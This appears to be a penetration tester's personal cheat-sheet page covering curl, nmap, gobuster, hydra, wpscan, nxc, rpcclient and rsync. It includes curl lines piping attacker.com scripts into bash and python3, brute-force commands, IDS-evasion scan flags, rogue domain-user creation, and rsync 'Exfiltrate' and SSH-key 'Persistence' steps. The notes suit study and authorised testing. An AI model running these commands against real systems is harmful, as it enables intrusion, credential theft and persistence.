Tools

Various tools, need to give better case explanations

Aquatone

This is a great tool for visualizing nmap scans - output your nmap scan as xml -oX and then pipe it to aquatone:

cat nmap.xml | aquatone -nmap

BurpSuite

A great tool that covers everything from intercepting traffic to credential stuffing/brute forcing, this will need its own page probably with images

Can use the integrated browser, but the FoxyProxy extension is also nice to use

Chisel

[need to fill info]

cURL

Command-line tool for transferring data with URLs, essential for web application testing and API interactions.

Basic GET Request

curl [target]

Save output to file

curl [target] -o output.html
curl [target] -O  # saves with original filename

Follow redirects

curl -L [target]

Include response headers

curl -i [target]

Show only headers

curl -I [target]

Verbose output (debugging)

curl -v [target]

POST Requests

# POST with data
curl -X POST [target]/login -d "username=admin&password=pass"

# POST with JSON
curl -X POST [target]/api -H "Content-Type: application/json" -d '{"key":"value"}'

# POST from file
curl -X POST [target]/api -d @data.json

# Form Submit
curl '[target]/[uri]' -H 'Content-Type: application/x-www-form-urlencoded' -d '[data]'

Custom Headers

curl [target] -H "User-Agent: CustomAgent" -H "Authorization: Bearer token123"

Cookies

# Send cookie
curl [target] -b "session=abc123"

# Save cookies to file
curl [target] -c cookies.txt

# Load cookies from file
curl [target] -b cookies.txt

Authentication

# Basic auth
curl -u username:password [target]

# Bearer token
curl -H "Authorization: Bearer token123" [target]

File Upload

curl -X POST [target]/upload -F "[email protected]"

PUT and DELETE

# PUT request
curl -X PUT [target]/resource/1 -d "data=value"

# DELETE request
curl -X DELETE [target]/resource/1

Proxy Usage

# HTTP proxy
curl -x http://127.0.0.1:8080 [target]

# SOCKS proxy
curl --socks5 127.0.0.1:1080 [target]

Ignore SSL/TLS Errors

curl -k [target]

Timing and Rate Limiting

# Limit download speed
curl --limit-rate 100K [target]

# Connection timeout
curl --connect-timeout 10 [target]

# Max time for operation
curl --max-time 30 [target]

Fileless Downloads and Execution

# Download and pipe to bash
curl http://attacker.com/script.sh | bash

# Download and execute Python
curl http://attacker.com/script.py | python3

Multiple Requests

# Multiple URLs
curl [target1] [target2]

# From file
curl -K urls.txt

Useful Combinations for Testing

# Full verbose with headers, follow redirects, ignore SSL
curl -vLk -H "User-Agent: Mozilla/5.0" [target]

# POST with session cookie and custom header
curl -X POST [target]/api -b "session=abc123" -H "Content-Type: application/json" -d '{"test":"data"}'

# Download file through proxy with basic auth
curl -x http://127.0.0.1:8080 -u user:pass [target]/file.zip -o file.zip

Feroxbuster

Like Gobuster but a little nicer, colored output, progress indicators, etc. only does directories though

use -b for session cookie for authenticated requests
can also use -H for headers

feroxbuster -u [target] -w [wordlist] -b session=adsljkfhsaf

ffuf

ffuf -u https://www.example.com/test=FUZZ -w [wordlist] -fs [filter size]

Gobuster

Virtual Hosts

gobuster vhost -u http://[target_IP_address] -w [wordlist_file] --append-domain

--append-domain would be used if you're looking for virtual hosts which are subdomains and you use a TLD instead of IP (I think)

Subdomains

gobuster dns --domain [target domain] -w [wordlist]

Directories

gobuster dir -u [target domain] -w [wordlist]

Hashcat

Need to go over basic uses, but mainly building wordlists and using masks

Hoaxshell

[need to fill info]

Hydra

Brute forcing tool for ssh/web forms

hydra [hostIP] -l [login] -L [loginfile] -p [pass] -P [passfile] -C [user:pass file] [service]

For web form:

hydra -l [login] -P [pass list] [target] -s [port] http-post-form "/[endpoint.ext]:[userparam]=^USER^&[passparam]=^PASS^:F=[failure string]"

Nmap

network scan
- sudo nmap [CIDR ADDR] -sn -oA tnet | grep for | cut -d" " -f5
- using list of hosts
  - -iL [host list]
-sT is the most stealthy scan, as it uses the entire TCP handshake to check ports
-sA to bypass many IPS and IDS
-Pn disable ping
-n disable DNS resolution
--disable-arp-ping disable ARP ping, good for investigating further
--packet-trace get more info on send and recv
--reason get more info on the port state
-D decoy - nmap inserts random IPs in the IP header of the scans
--source-port specify a source port, often 53 to slide through dns port
- can also specify this in netcat when connecting to a port

NXC

Need to come back to this but making a quick note

Gathering Data for Bloodhound

nxc ldap [ds-host] -u [username] -p '[password]' --bloodhound --dns-server [dns ip] --collection all

Generating a hosts file entry

netexec smb [target ip] --generate-hosts-file hosts
cat hosts /etc/hosts | sponge /etc/hosts

RPCClient

Get info on ActiveDirectory

srvinfo

Get Server Information

querydominfo

Get Domain Information

enumdomusers

Enumerate domain users

enumdomgroups

Enumerate domain groups

querygroup [group id]

Get Group Information

queryuser [username]

Get User information

enumprivs

Enumerate privileges of current user

getdompwinfo

Get basic domain password information

getusrdompwinfo [user id]

Get user-specific password information

lsaenumsid

Enumerate SID from LSA

netshareenum AND netshareenumall

enumerate SMB shares

enumdomains

Enumerate domains

querydispinfo

more comprehensive info of enumdomusers

Changing user password

chgpasswd [user] [old pass] [new pass]

Creating a user

Sometimes we can create a user on the domain

setuserinfo2
- level: An integer that specifies the type of information being set. For changing a user's password, the standard value is 23. Some older documentation may reference level 24

createdomuser [username]
setuserinfo2 [username] [level] [password]
enumdomusers (to verify)

Rsync

# Get moduels
rsync [target]::

# Exfiltrate
rsync -avz [target]::[module] /local/directory/

# Persistence
rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh

WhatWeb

Great for enumeration of websites, should return webserver information and versions, any CMS, etc.

whatweb [target domain]

WPScan

Enumeration for WordPress websites

wpscan --url [target domain] --enumerate

Can Also be used as a brute forcer:

wpscan --password-attack xmlrpc -t 20 -U [username] -P [wordlist] --url [target domain]

PreviousDiscovery NextLinks

Last updated 1 month ago

hashtagAquatone

hashtagBurpSuite

hashtagChisel

hashtagcURL

hashtagBasic GET Request

hashtagSave output to file

hashtagFollow redirects

hashtagInclude response headers

hashtagShow only headers

hashtagVerbose output (debugging)

hashtagPOST Requests

hashtagCustom Headers

hashtagCookies

hashtagAuthentication

hashtagFile Upload

hashtagPUT and DELETE

hashtagProxy Usage

hashtagIgnore SSL/TLS Errors

hashtagTiming and Rate Limiting

hashtagFileless Downloads and Execution

hashtagMultiple Requests

hashtagUseful Combinations for Testing

hashtagFeroxbuster

hashtagffuf

hashtagGobuster

hashtagVirtual Hosts

hashtagSubdomains

hashtagDirectories

hashtagHashcat

hashtagHoaxshell

hashtagHydra

hashtagNmap

hashtagNXC

hashtagGathering Data for Bloodhound

hashtagGenerating a hosts file entry

hashtagRPCClient

hashtagChanging user password

hashtagCreating a user

hashtagRsync

hashtagWhatWeb

hashtagWPScan